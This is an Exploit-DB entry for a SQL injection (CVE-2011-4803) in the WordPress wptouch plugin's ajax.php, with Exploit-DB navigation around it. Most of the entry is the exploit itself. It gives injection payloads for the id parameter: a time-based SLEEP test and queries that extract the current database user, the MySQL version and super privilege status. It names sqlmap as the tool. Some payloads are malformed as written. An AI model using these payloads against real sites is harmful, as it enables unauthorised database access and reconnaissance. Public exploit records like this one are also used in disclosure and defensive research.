WordPress Plugin wptouch - SQL Injection

EDB-ID:

18039

CVE:

2011-4803

EDB Verified:

Author:

longrifle0x

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2011-10-27

Vulnerable App:

# Exploit Title: WordPress wptouch plugin SQL Injection Vulnerability
# Date: 2011-27-10
# Author: longrifle0x
# software: Wordpress
# Tools: SQLMAP
---------------
(POST data)
---------------

http://www.site.com/wp-content/plugins/wptouch/ajax.php

#Exploit: id=-1; id=- AND SLEEP(5) or 1=if

http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][CURRENT_USER()

http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][SELECT
(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT
0,1)='Y') THEN 1 ELSE 0 END)

http://site.com/wp-content/plugins/wptouch/ajax.php][GET][id=-1][MID((VERSION()),1,6)

Tags: WordPress Plugin

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services